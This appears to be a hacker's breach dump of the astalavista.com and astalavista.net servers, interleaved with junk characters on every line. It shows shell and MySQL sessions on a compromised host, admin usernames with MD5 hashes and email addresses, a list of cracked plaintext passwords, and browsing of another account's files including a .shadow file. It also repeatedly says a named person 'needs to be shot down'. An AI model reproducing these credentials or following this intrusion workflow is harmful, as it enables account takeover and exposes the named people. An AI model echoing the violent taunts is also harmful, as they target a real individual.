8 v6 C* n8 y; I( o <language>en-us</language>
# s: O8 i. K0 a: t( x <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>0 Q, |" C* @- G; T) L. _* O
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
& v* b8 ^6 I( u" B4 {" ? <generator>Astalavista.com</generator>
$ {* V) d! r1 a <webMaster>info@astalavista.com</webMaster>’ . $items . ‘) I m# r- p2 O
</channel>2 A4 E( i- ~5 t& Q$ A
</rss>’;. w5 p0 T ^" \ P
" r2 `" H+ U6 m; _2 A2 \9 f; M; D
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
! J# p' _( k: V0 e* G0 b6 R4 E" @. T unlink (FULLPATH . ‘/feed/exploits.xml’);
! h0 Y m' x& J. B! p0 ~- o1 d* ^ }9 j& A" x2 w4 g' Z
, z, Y; _- m: ]1 c file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);7 Q* D" q' ?& G' P
[snip]$ U: z& K5 G: W2 j7 Y
- N/ D) L1 W) W6 J& ?1 {sh-3.2$ cat exploits.sh; ]1 i% Y4 M$ L' `+ ]
#!/bin/sh" Q# r% d8 ^! r9 H8 Q J
/ n5 T0 Z$ P, `, D) q3 B c###########################################################
, L. H1 I7 d3 Z7 p# #
: z' j$ {; N6 [! L- ~2 G: {1 p# Title: milw0rm exploits adder #. n# [5 H# t" a, ]6 M1 U
# Description: Add all milw0rm exploits to the #
7 Z; Y8 T; }# L- i6 [) N. K* [5 {# Astalavista.com database #
3 a) M6 ]% j0 Q0 ?. i# #8 n" ^& ]8 i7 \- U, n2 C( T5 H) c+ [
# Company: Astalavista Group #5 @* o, @* o( l2 G$ _6 ]5 t
# Author: Paulo M. Santos #
, E% q# W" J- L } c4 k5 J8 \# E-Mail: 链接标记paulo.santos@astalavista.ch #
( A! F) ]- @. E7 k7 R# #
; u8 _5 C5 ?- b###########################################################! u8 R% f1 f1 j o. W8 v1 H9 Y
2 H* L# ^" m' z. I% `0 L# f5 o# path
8 \9 r- w7 _: M: Sthis_path=/home/com/public_html/modifications/cronjobs3 j2 G8 }; T$ P: P( I: M9 ]4 [# H7 f
. G I5 B$ \5 i6 [
# change directory( @% Z5 s- c$ ~" _; U
cd $this_path, q; Y1 U- A x$ o, h; I
cd tmp/! M1 _% Z; X( ^+ `; o
) c/ q: i% N5 C. Y6 j: y, [- i# delete files
2 d9 I# V. j$ u" z9 ]$ A) hrm -rf milw0rm.tar.* &
5 S% ^6 F, V* Urm -rf milw0rm/ &
8 A& o- |: f% d$ K8 }5 L! H; j/ d h4 H$ B4 D
# wget milw0rm paket' o% H, \& y6 L$ f3 R' i
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]0 U( e; ]3 `1 S2 N. Y7 W2 l' c
$ H0 b4 [; m5 N% K( }( p
# extract milw0rm paket4 t: B0 L7 J. j2 |8 i* E
tar -xvf milw0rm.tar.bz2. ]! r. m+ W7 @4 U7 w) X9 k1 ~$ l. g
; [( I$ Z0 B; Y1 J2 P
# change owner
) q4 F6 U3 O; Y6 xchown -R com .% T5 Y. m7 O' `+ o( F; y+ U
chgrp -R com .5 w6 l' P7 ]! b3 j f! m8 U9 U, b3 k9 D
* Y& S- [! ?- R0 }! L# execute php script# o2 k5 C+ Y7 {
cd $this_path
# S2 D+ T1 a/ Vphp -q exploits.php
( f) j/ u( f6 @2 c& J& l1 R
6 _5 M7 \* S+ `: V1 X# delete files6 O4 [& a0 p: _7 d. {: Z* d
rm -rf tmp/milw0rm.tar.*
4 A% C* Q8 `4 ?rm -rf tmp/milw0rm/. i" D6 c! p! e; N8 w H& ?
: d5 e% p/ ?* u4 A& P/ ?sh-3.2$ echo “Paulo M. Santos needs to be shot down.”0 X+ M& g J/ ]% @
Paulo M. Santos needs to be shot down.
# t3 n2 r4 z" q. Y4 |' d# G# B, N
# R8 Q9 P1 Y$ N. m4 x# r" Amysql -u contrexxuser2 -p8 g) n) T; M1 I- j& S% k
Enter password:$ \. f5 y; X4 V: T C3 L
Welcome to the MySQL monitor. Commands end with ; or \g." c9 t& Q1 r# M+ ]
Your MySQL connection id is 261694
! J3 d' R. u4 r9 h, J' x; _7 hServer version: 5.0.45-community-log MySQL Community Edition (GPL)
$ r( ~3 E1 X) ^* W, @% D( N$ ~" x( j0 w: B5 N1 j: Q2 c) |
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
z# v% l5 L& z( w! C" a+ V
# j9 {+ F. d! N5 fmysql> show databases;- h) t# @0 O) E. {9 N
+——————–+" b: x* w: s% [. e- ~1 w
| Database |
: U3 X# f: e* G. V# }+——————–+, X. n7 J5 x4 C
| information_schema |) O; Z) Q: R4 p |+ M% S
| com_contrexx2 |
9 f# F, M7 ]; ?5 b9 y| com_contrexx2_live |
, T: k! k) L4 K! m$ _) p" o| test |
0 X: P* f+ x2 V5 h+——————–+' _; s" t2 F+ J8 d1 W
4 rows in set (0.00 sec)
$ {0 V- h# m2 o( X
, k1 e: b0 E( X* K# @; `: Zmysql> use com_contrexx2_live
9 m% \ S% p! RDatabase changed+ A& p L1 f1 U* C! j0 _; G% v0 Z! y1 t
mysql> show tables;
5 E6 v _8 ^6 H6 G) K+————————————————–+
- f1 C' o/ y9 G6 j9 _| Tables_in_com_contrexx2_live |
* I5 S5 V( p7 M# S5 r! c+————————————————–+" ?& j( `% ?' x& L: j& X) }
| cc_banner_counter |; F; e C) l3 J1 d7 S4 ?; Q: e
| cc_search_counter |( x" x! U/ Q! H9 v' k& O6 _, C
| contrexx_access_group_dynamic_ids |' b- P) Z' F) g1 _, m
| contrexx_access_group_static_ids |
4 m: r' j- l3 I3 Q% {| contrexx_access_rel_user_group |0 M. U5 A, O. N6 I0 g9 N5 x
| contrexx_access_settings |2 g9 C1 E( T8 `7 L- H
| contrexx_access_user_attribute |. k8 j/ o* ]% F
| contrexx_access_user_attribute_name |
; s4 Y# n. ]. r+ \| contrexx_access_user_attribute_value |
* Y5 ~( u! A1 @. A8 H( R9 v8 G| contrexx_access_user_core_attribute |
- o+ j# F! X, o: ~- U| contrexx_access_user_groups |" X6 C# Z5 T' _5 Y0 ?3 q
| contrexx_access_user_mail |% }" l% b8 t+ O, t# I2 R' q
| contrexx_access_user_profile |
9 c, b' D2 F) G| contrexx_access_user_title |
# Y/ p/ q, `# Q4 o| contrexx_access_user_validity |
/ c- L4 b9 P+ o' P0 K3 [3 e/ _) h1 b| contrexx_access_users |" ^; e1 _, z( N2 M/ M( D$ |- N
| contrexx_backend_areas |/ @. ]4 Z7 A; f" a# G) D6 f: v
| contrexx_backups |3 @& E8 x/ m* x3 W# r1 C; w
| contrexx_content |( g/ }( s4 h5 B. W) O, {
| contrexx_content_history |8 v- p/ T- a- T4 T* X/ p* h
| contrexx_content_logfile |
8 ^% ^8 J% d- g' A| contrexx_content_navigation |+ V+ s* m0 b$ f+ ^
| contrexx_content_navigation_history |9 O& L B9 |$ H0 V4 [
| contrexx_ids |
0 v2 g R$ [) T" a1 F& [| contrexx_languages |
- g+ L, U% ~, S$ K0 q0 ~! ]6 q| contrexx_lib_country |
" A4 D6 }" \2 D) A& D7 M# M| contrexx_log |( b/ {; b p: F- m9 l2 b6 L
| contrexx_module_alias_source |
9 m2 Q6 Q/ B2 z; a/ p+ q* z| contrexx_module_alias_target | u+ }. d! S) J- l" K) s4 J9 j
| contrexx_module_block_blocks |% p k( _" V+ C+ H1 d
| contrexx_module_block_rel_lang |
$ ^8 b5 f7 ]! Z9 M; f: a| contrexx_module_block_rel_pages |1 a& q3 ~, e$ B& `3 s. L- w9 ^: p
| contrexx_module_block_settings |7 {. S# o7 t! t; Q4 R
| contrexx_module_blog_categories |9 Q* F- J8 k- P" Y
| contrexx_module_blog_comments |
- h4 h* l: ~- ]| contrexx_module_blog_message_to_category |2 Q# Q% o9 ]' m; A& ~4 j7 |6 S0 L
| contrexx_module_blog_messages |
2 q( U# f6 K( ?' ~| contrexx_module_blog_messages_lang |
0 z+ \0 k. q, V' @7 ?, H$ w( R \| contrexx_module_blog_networks |
* M r$ w" @7 Z. l| contrexx_module_blog_networks_lang |
1 j3 u' J% L) x% Z& H# ]5 u| contrexx_module_blog_settings |/ x+ S1 @) \" F- T5 T
| contrexx_module_blog_votes |! _* y1 ^& o# }8 F! K1 U
| contrexx_module_calendar |
' e. L) K2 o2 |0 M| contrexx_module_calendar_access |9 X1 L, z$ W) B- W3 b. l" C+ G
| contrexx_module_calendar_categories |! W, {3 M L: s* Z
| contrexx_module_calendar_form_data |& f" Z V w+ E: q' j# v
| contrexx_module_calendar_form_fields |
1 F# L' o8 y2 j- B& [, X1 k, i' m| contrexx_module_calendar_registrations |+ |2 a$ q+ ?" P/ W9 z* K4 ]8 ?5 \& }
| contrexx_module_calendar_settings |6 D/ a- i; E! p+ x* u! p) x
| contrexx_module_calendar_style |
$ d( \! L6 @ n3 ^| contrexx_module_contact_form |$ _( Q, }, g: Q- G0 B5 ?
| contrexx_module_contact_form_data |: I2 Y# Y1 ]+ e7 U% y p0 A
| contrexx_module_contact_form_field |# B9 G- v1 H" b
| contrexx_module_contact_settings |
" e1 ~. ]& N# _0 T2 H$ q5 h| contrexx_module_data_categories |5 z+ S" X O y7 ]! Q
| contrexx_module_data_message_to_category |8 x9 C1 w$ H3 c4 V8 y: n( u+ V1 m6 A
| contrexx_module_data_messages |
* R" u% ^! K) ^4 _; m| contrexx_module_data_messages_lang |
! t+ }! u. U( x( P' C$ f% x| contrexx_module_data_placeholders |* O, k0 j o+ L v+ h
| contrexx_module_data_settings |4 U) a) F: ~3 p) Z9 ~/ k" _2 s2 T
| contrexx_module_directory_access |0 y2 U& H- { g- {1 v( s
| contrexx_module_directory_categories |
3 f9 E% Y, N: B. E: `) X| contrexx_module_directory_dir |% o0 V& Q0 {8 \
| contrexx_module_directory_inputfields |
9 {, W% K$ o- i7 h0 h" r( H| contrexx_module_directory_levels |
]4 |( W/ S; o3 p {- N| contrexx_module_directory_mail |1 @7 ~ Q* m3 g9 |- K3 R1 u% Z k
| contrexx_module_directory_rel_dir_cat |; p+ q8 n: W- W" K; N
| contrexx_module_directory_rel_dir_level |2 }+ i2 J: V# C& }6 v
| contrexx_module_directory_settings |
2 K( |: z( C5 |: u7 U4 K5 k! P| contrexx_module_directory_settings_google |3 h- E4 F! N$ f9 s! O
| contrexx_module_directory_vote |( r8 r3 H% g4 O3 V& K. b, w: T G0 ?
| contrexx_module_docsys |
; l' v3 N7 e8 ^| contrexx_module_docsys_categories |
9 j. k5 K3 C2 g3 F2 R) u| contrexx_module_egov_configuration |
( v' _# n1 D; ?- ^1 V- h8 V+ L| contrexx_module_egov_orders |
' m- m7 w6 E, y, O| contrexx_module_egov_product_calendar |. [, ]( u" {; g, T
| contrexx_module_egov_product_fields |
7 e% @1 u* o/ o/ M2 U$ K| contrexx_module_egov_products |9 r" n# T/ g8 |/ O+ c# p
| contrexx_module_egov_settings |& e9 o6 }9 y5 x% u8 v
| contrexx_module_exploits |8 a9 [" x% s/ |! I1 d. M/ X, `
| contrexx_module_exploits_categories |9 V4 P/ L; O- A* ~3 ?
| contrexx_module_feed_category |
6 B# b9 g; p4 {7 l5 X| contrexx_module_feed_news |
$ p/ u" t1 I. i4 m6 P j4 C| contrexx_module_feed_newsml_association |
+ Q# x9 I. k9 n2 o| contrexx_module_feed_newsml_categories |' d5 t: @9 G1 F M! G, c# w I: h
| contrexx_module_feed_newsml_documents |
6 d! r! e7 H8 F( X| contrexx_module_feed_newsml_providers |' K1 v# f' \4 [, G9 t+ {
| contrexx_module_forum_access |
: a) c! y& x- v/ y6 y: y% m" u| contrexx_module_forum_categories |( ?+ q+ m7 z7 d3 e
| contrexx_module_forum_categories_lang |1 K- R ~. R+ k6 X" `6 q
| contrexx_module_forum_notification |; c* c# N1 Q8 a; X
| contrexx_module_forum_postings |* G h& A& C% s& w5 e7 K+ y
| contrexx_module_forum_rating |
) m3 O! A2 Y, s6 \+ B: d| contrexx_module_forum_settings |
6 J7 N3 c3 x& ^1 Y* C& f| contrexx_module_forum_statistics |+ B& I! I- e& P1 N$ Q# X- z/ [/ B H
| contrexx_module_gallery_categories |0 ^ e3 O+ G# O2 \) F( V
| contrexx_module_gallery_comments |' a, L& w9 g$ a- A' r8 `$ S
| contrexx_module_gallery_language |! _! K; O/ s" L
| contrexx_module_gallery_language_pics |
! z& x7 `" v! B4 S| contrexx_module_gallery_pictures |
" P4 r5 Z9 ~) q( @9 {- F| contrexx_module_gallery_settings |
, s" q5 o& z3 b1 I/ d4 o _| contrexx_module_gallery_votes |2 K; m" y c$ L9 L! `! R6 A. \' K
| contrexx_module_guestbook |
r+ ^; d! C# X, T0 k: ^| contrexx_module_guestbook_settings |
% h% f ~/ {" }+ T; G. k| contrexx_module_livecam |
: U% i4 y8 b4 w4 r# a8 n| contrexx_module_livecam_settings |* T5 ]- j* {. I0 l
| contrexx_module_market |
; a5 r: n2 u( t4 [/ @| contrexx_module_market_access |
& Y5 T0 m. [% T9 |( H" c/ b| contrexx_module_market_categories |2 t7 R, K1 n5 H" l. k; D
| contrexx_module_market_mail |3 G+ X1 r( v7 b- R: t
| contrexx_module_market_paypal |
% l6 h' k, G2 ]5 E* y ^# n| contrexx_module_market_settings |
! N0 g3 X& d% G- T% B8 e| contrexx_module_market_spez_fields |$ O9 I+ M! x+ I/ v) D @
| contrexx_module_mediadir_access |. a% o) `+ j* U/ ^1 z0 `
| contrexx_module_mediadir_categories |
8 ^ O3 N; o3 e& [4 |; l| contrexx_module_mediadir_comments |
% B5 I6 W N) @4 N$ P0 G| contrexx_module_mediadir_dir |
4 O7 t. |3 x& k- `; S+ c8 r/ D| contrexx_module_mediadir_inputfields |; F! v9 h; Q" z0 ]8 b
| contrexx_module_mediadir_levels |
+ ?3 s! i4 N7 ]* S" t. F| contrexx_module_mediadir_mail |
( T* H8 A- |0 Z9 b| contrexx_module_mediadir_rel_dir_cat |: e7 S. u |+ ]8 Y2 Y- F
| contrexx_module_mediadir_rel_dir_level |
1 O2 f; J6 \* o! H. h+ d. K3 j| contrexx_module_mediadir_reports |
& z3 B# R) t5 O0 T M% h9 K. ?| contrexx_module_mediadir_settings |0 w7 }! ^* L* M- s
| contrexx_module_mediadir_settings_google |
$ q2 f, v7 ]/ n0 [% U3 v. p% L| contrexx_module_mediadir_vote |: m( W9 K) _# {, m1 W" V
| contrexx_module_memberdir_directories |
/ G5 ^. A* A. C1 ^: p7 a+ T| contrexx_module_memberdir_name |9 i/ M$ Y- \" W0 I, d! e
| contrexx_module_memberdir_settings |
0 a% t& q1 f/ u! l| contrexx_module_memberdir_values |
( j# K$ p5 k& c+ g& o/ c' ]| contrexx_module_nettools_allowed_groups |" H5 M7 q' t9 ]! q
| contrexx_module_nettools_settings |" \ v$ u+ [7 k& A" ^
| contrexx_module_news |- ?7 R2 [& y( e" J
| contrexx_module_news_access |
! E2 n7 H) V/ I| contrexx_module_news_categories |
; y# [! _5 w: P: z2 ]( _- V| contrexx_module_news_settings |
) c+ a5 Y2 b+ I3 W* ?| contrexx_module_news_teaser_frame |+ k3 T( N; p1 f3 S
| contrexx_module_news_teaser_frame_templates |
$ d5 J! m! E$ q9 N7 y$ v| contrexx_module_news_ticker |
1 A( [; v( S; n7 _4 ~$ z0 L% b| contrexx_module_newsletter |
% H: a2 v( v% R| contrexx_module_newsletter_attachment |; c2 s7 w1 D" l2 k8 e% l
| contrexx_module_newsletter_category |3 J& \7 n7 A- E: x
| contrexx_module_newsletter_confirm_mail |
! V0 [0 D% k/ ^/ f, a- ]% t/ N| contrexx_module_newsletter_rel_cat_news |
2 i& o6 u0 y5 ^| contrexx_module_newsletter_rel_user_cat |
$ M( I: C- N4 w& w$ s. T; @$ Y| contrexx_module_newsletter_settings |
: a4 E. L8 I* Z y3 x/ ^( c8 d| contrexx_module_newsletter_template |
) `" T* o( z+ k9 g| contrexx_module_newsletter_tmp_sending |0 X- W: J) V2 v; e+ V
| contrexx_module_newsletter_user |+ t$ x& o7 K" B6 W; h
| contrexx_module_newsletter_user_title |% u6 L+ j9 x* {8 y1 d; p
| contrexx_module_onlinetools_defaultports |9 r" V' v8 M4 `) r, ~
| contrexx_module_onlinetools_defaultports_back |3 m7 H3 s* e' J0 A0 w4 l- v. D
| contrexx_module_onlinetools_geolitecity_blocks |
: t! l. }8 n: V0 Q; O- g" F6 c& D| contrexx_module_onlinetools_geolitecity_country |5 |' O4 v6 `+ v2 G* K- [
| contrexx_module_onlinetools_geolitecity_location |
3 g" H& c2 p [1 E| contrexx_module_podcast_category |% V: }/ I! A* c
| contrexx_module_podcast_medium |
1 S8 X* {# z; i3 I9 m- L& z, f/ ?| contrexx_module_podcast_rel_category_lang |
# K% a' u7 E5 N! [# [1 y| contrexx_module_podcast_rel_medium_category |6 l; t3 M, R3 I. I5 V
| contrexx_module_podcast_settings |
! h, ?5 v( c+ z/ _* Y; a( H; _, }| contrexx_module_podcast_template |
* R( r$ }3 I' F5 x| contrexx_module_proxydb |+ I6 ?/ a' h, [- L
| contrexx_module_recommend |
8 g5 C* Y9 k7 I! ~! G" \- q5 d| contrexx_module_repository |
) Y3 v* _1 i5 Q2 u7 W* f" o| contrexx_module_securitynews_cats |
# u0 |$ l( F4 G( G! V/ ^6 ^| contrexx_module_securitynews_feeds |) ]4 }' w9 b# U# C! q6 a
| contrexx_module_securitynews_news |
6 Z, j% E, [3 T9 c0 t| contrexx_module_shop_categories |" l9 |+ ~9 T" q6 L& b9 I
| contrexx_module_shop_config |5 v1 E5 Z2 z& x1 W* E% O
| contrexx_module_shop_countries |
% f$ L: ]7 O% m0 H/ U: J| contrexx_module_shop_currencies |; d2 L5 w% U3 b; @
| contrexx_module_shop_customers |
, h/ V: {# |: M8 o0 ]+ s4 Z| contrexx_module_shop_importimg |0 B" V5 @& U1 {3 [
| contrexx_module_shop_lsv |: q' x5 A2 Q1 j( f1 p
| contrexx_module_shop_mail |- I- r' I, ?3 c! g" M4 Y
| contrexx_module_shop_mail_content |
" f$ U4 ?2 c' Q7 _1 || contrexx_module_shop_manufacturer |
! d. O% q: g+ Q0 a- v| contrexx_module_shop_order_items |
/ r2 T Z2 r" O% _9 h! V( o| contrexx_module_shop_order_items_attributes |! u1 q# ?1 P9 N
| contrexx_module_shop_orders |
$ ~. J! F7 R. j" w| contrexx_module_shop_payment |
9 q: |* M* M7 [| contrexx_module_shop_payment_processors |
' R' q7 \4 j# C [| contrexx_module_shop_pricelists |
5 L! H: ~1 z- U% l+ [5 i# V| contrexx_module_shop_products |" g8 B* x/ {" K5 t. L) `
| contrexx_module_shop_products_attributes | }, M& {+ }9 G" I
| contrexx_module_shop_products_attributes_name |
; h7 P+ w# D& @ j0 A# B; ?| contrexx_module_shop_products_attributes_value |
1 V# I' H/ t1 s- N, z' Q| contrexx_module_shop_products_downloads |
6 i$ S% y0 ?$ A6 c3 S| contrexx_module_shop_rel_countries |7 B2 {5 S" C' ^7 n" H( n
| contrexx_module_shop_rel_payment |* r3 |# k; \6 Z
| contrexx_module_shop_rel_shipment |
5 u# m j. u6 x# \" T, n. M| contrexx_module_shop_shipment_cost |" Y O4 \' W+ N- o
| contrexx_module_shop_shipper |
: x% i6 M8 F" B0 E7 Q- v| contrexx_module_shop_vat |$ E( k5 \8 z$ I5 a( ^/ U
| contrexx_module_shop_zones |/ j. n; z) e7 ]2 s4 V( B( I( b
| contrexx_module_u2u_address_list |
2 a0 |; V' l, L/ M; y| contrexx_module_u2u_message_log |2 n+ h8 x5 w+ v9 b' }$ f
| contrexx_module_u2u_sent_messages |) {4 I: [$ p3 ?: J5 s
| contrexx_module_u2u_settings |
- @ h; d& S1 J- Y- B8 e| contrexx_module_u2u_user_log |+ [6 U2 g( D5 E. w: v2 ^ H
| contrexx_modules |( a3 Q( I2 ~/ s" V6 I
| contrexx_sessions |- T( O5 }4 ]4 F% w4 w! O
| contrexx_settings |
1 w3 y5 h$ d0 [, i| contrexx_settings_smtp |
9 k5 ~. F s# `- H1 B% p| contrexx_skins |
* k; O8 E7 F( H& G| contrexx_stats_browser |# H( G) `% G% c$ z
| contrexx_stats_colourdepth |& @4 K; k( V( f1 \% ?/ K
| contrexx_stats_config |" g6 F. k* l2 B3 d( j. d7 T0 s3 W
| contrexx_stats_country |- ^# x) N4 d* ]! L
| contrexx_stats_hostname |
; l0 \; K1 J$ {1 U| contrexx_stats_javascript |: W) P8 F9 A$ ~3 }/ @4 q
| contrexx_stats_operatingsystem |. g2 M. y& O! w9 V; I
| contrexx_stats_referer |9 n5 H2 d4 M' [' o1 i% S" j) L! s
| contrexx_stats_requests |
* C$ Z# y; K, m& l+ S| contrexx_stats_requests_summary |* Q4 l- a# P2 U; V
| contrexx_stats_screenresolution |8 ]6 y1 r o0 v" |
| contrexx_stats_search |
$ L0 \4 W r! H+ {| contrexx_stats_spiders |3 F" C4 l! [. C
| contrexx_stats_spiders_summary |
0 }9 f% M( ?+ Y7 Y3 U+ @| contrexx_stats_visitors |" H) X% e# X+ ]
| contrexx_stats_visitors_summary |4 t( h$ I) h# K2 n! t4 i
| contrexx_voting_additionaldata |
3 D: W5 D6 U; g# |. r| contrexx_voting_email |
% q/ o) Q0 u6 c3 O/ Z. i9 D| contrexx_voting_rel_email_system |% q F# X$ w3 z4 _1 N/ E
| contrexx_voting_results |
) ?' z# {3 |" P2 l# y4 v| contrexx_voting_system |
6 `/ R4 d) }! \& U| foo |
- L' m8 R$ W, A4 X+————————————————–+2 X0 U0 h; c$ P3 `, H- l) X
227 rows in set (0.01 sec)
" |" A# s5 a" A2 z! ~) ~
) G! G5 q5 n3 K+ i8 d& y- kmysql> select count(*) as skids from contrexx_access_users;
1 C e, _4 ?3 C! i# F$ T+——-+. [# _& w* I% [- z% v
| skids |
2 x- d/ N% e! H: h2 m+——-+( u7 h( z) o f8 W' {! y9 q
| 53699 |9 v) L2 b8 f4 _7 n$ L+ m
+——-+# j' v5 `8 ]* N1 b- ~& c% m
1 row in set (0.00 sec)
6 B4 {3 c- u+ w" e1 R8 ^" [8 B ?4 p0 p) l& \; }
mysql> describe contrexx_access_users;
3 K: O2 l2 o4 y8 t+——————+——————————————+——+—–+————–+—————-+
1 K" R/ a0 c1 E" Y| Field | Type | Null | Key | Default | Extra |3 N2 M9 J- U' ?8 o. S0 B
+——————+——————————————+——+—–+————–+—————-+- T# f2 R, N, i7 m4 ^
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
1 _7 k! l# I8 C5 ^0 t" u| is_admin | tinyint(1) unsigned | NO | | 0 | |
. _$ j3 V9 g+ q/ j" s' T| username | varchar(40) | YES | MUL | NULL | |
; |( I% I2 S- v) L' Q0 C% M2 [0 b| password | varchar(32) | YES | | NULL | |
9 ]. U7 M9 U& t6 R) A6 u% J/ _- H| regdate | int(14) unsigned | NO | | 0 | |
. j1 v3 k; K+ r2 ~! P| expiration | int(14) unsigned | NO | | 0 | |0 V% N; ?' }" O+ \( G2 E
| validity | int(10) unsigned | NO | | 0 | |
/ M ^, _- q9 l3 f| last_auth | int(14) unsigned | NO | | 0 | |( e+ {% ^* `7 t- a: N. \
| last_activity | int(14) unsigned | NO | | 0 | |) Y. |3 j4 V% z* Y# e. w0 ~. z
| email | varchar(255) | YES | | NULL | |
5 K; F% ^! _/ l$ t, o- l% ?( b8 u. a| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
4 \0 x* U" e/ h' {; u; _2 R: y2 {7 @| frontend_lang_id | int(2) unsigned | NO | | 0 | |% O1 B! J% R. `! N, m
| backend_lang_id | int(2) unsigned | NO | | 0 | |) K5 K5 S/ I* b0 G
| active | tinyint(1) | NO | | 0 | |1 O6 `. L6 w- @1 y& i( A& y9 z! G
| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
, v0 s0 R( ]0 R| restore_key | varchar(32) | NO | | | |- w5 W6 p- p) W4 w
| restore_key_time | int(14) unsigned | NO | | 0 | |
0 o7 p" L+ I7 e5 L4 }| u2u_active | enum(’0′,’1′) | NO | | 1 | |
+ K7 |9 c; a) k+——————+——————————————+——+—–+————–+—————-+
; c- n& c1 ^0 O" Q2 b+ ]18 rows in set (0.00 sec)
$ S3 d# U& @9 H
( p. ~/ \4 `3 z! p p7 kmysql> select username,password,email from contrexx_access_users where is_admin = 1;$ ?9 Z/ ?' k, ^: V( V x/ [0 w
+————+———————————-+—————————–+
+ T q) }" A, T- a0 [9 i( M| username | password | email |6 a4 }6 }' X' |, E" n
+————+———————————-+—————————–+2 o) w1 R8 d2 h8 y8 B2 ~
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |$ C0 Q# k+ h: K. y1 {
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |- c, K9 l; w8 x) E' w9 k; J4 I
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |8 _* f& x1 d4 W" d+ X- {, l6 X
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
4 D; E3 p9 n) E9 S+————+———————————-+—————————–+, D* _) B4 ^% t1 u7 C
4 rows in set (0.04 sec)
' D. d7 w9 ]% k$ _& n; g1 j5 }' M6 D
mysql> exit;
: L5 Y F& P7 l+ x9 OBye
$ u/ k: e1 U+ _ l' N2 `) {: z+ ?2 w( N3 O9 E% q" E
[~] There you go, your “team of security and IT professionals” is a joke.- X- {; l* o# Z1 d! y+ a% Q
+ m/ T/ c8 I9 \+——————————+2 ?9 Y( {' Q# P, p
system:f82BN3+_*$ q5 W( Y k3 |: e W" D
Be1er0ph0r:belerophor4astacom
7 i- O) E- B. R/ v- z/ xprozac:asta4cms!. q$ E3 B/ _7 m7 q& w6 P o
commander:mpbdaagf6m; \+ h3 V7 a3 n4 V1 O, }
sykadul:ak29eral
7 P& `( A# ]* A4 W1 w+——————————+
+ }- W3 \& i/ N1 @! U3 g& J
) T6 u! w$ |1 u/ y$ e[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
Z$ a# P$ F" p/ |…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
/ w t2 v3 q, I6 E: @3 p1 K* H( _
; `; f+ x7 f. g: L7 G& G[~] Lets move to astalavista.net now,
2 \& {2 }+ c% p5 N2 N
c+ n1 F* Z f# O4 T' _: ^From <链接标记[url]https://www.astalavista.net/[/url]>:
' y2 J2 ]0 V( [0 S5 j$ a>> Everyone knows that the best defense is a good offense.
4 V$ ^5 H3 I* N! _>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
- v6 c- V. o" S' B* k>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
2 O. N: `7 V; I: p9 W% A* l* U>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”9 [* f" V/ l8 q' g$ K. M
% k( |4 Z' T4 i+ t>> Go ahead, try and hack our server . in a completely legal way!, Q2 a0 O& O1 V; s& `
>> Learn by doing: We offer our members tricky tasks and challenges on an
: C# X; o. n- k>> ongoing basis so you can test your knowledge and abilities. You can also
% i1 v* [) q# V>> demonstrate what you.ve mastered by taking part in regular hacker contests
- i( G6 y- z' p- V4 s9 c: m>> and war games2 A/ l* v: a, |/ B/ r3 M' S
3 c5 ^+ Z0 b. A; t' m% P[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
( Y! M$ [- x8 f) a3 D& E7 Q1 Q2 a7 S$ z& R q; U" j4 z; Y
[-] Tricky task: Find home dir of astalavista.net3 n$ |4 y4 Y: W- @! z7 h* o
+ R- L) _/ O. U2 w# ?8 lsh-3.2$ ls -la ~astanet7 R' \& Y# Y6 r0 C. U
total 48
# h, i- w- l7 C/ e9 edrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
! A! B* M0 V& J5 {, r- Z( Qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
% H/ A. Z8 C3 _" u% x2 tdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
8 D0 n# x8 M& A-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
5 _# f0 C; `" ?8 g* O-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout- }7 F0 n3 X+ B' Y6 C+ V% K# e
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
) g7 o& M7 q5 p: Y-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc5 p9 y" x, n7 j5 J {( D
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains) f- W+ t* S. T& U
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
: r/ l1 |& p. z; e* k; }drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail S2 b! \" \8 Q
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
9 ?. |. `5 ]# l' k% X+ L% z-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
8 P% G& i: L$ K+ n2 _
# l% m0 L( }. j2 k# n o. a+ msh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/: D5 T8 S# F' x* ^+ k
sh-3.2$ ls -la
: |' s( r' ]) w+ Dtotal 200
* t4 k6 N7 m4 Y+ `drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
' \ b3 H, b$ f4 f4 hdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..& j! i) t. i2 @: x# T
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _0079 P1 C( g. v: R$ \" v2 C' @8 L/ F
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
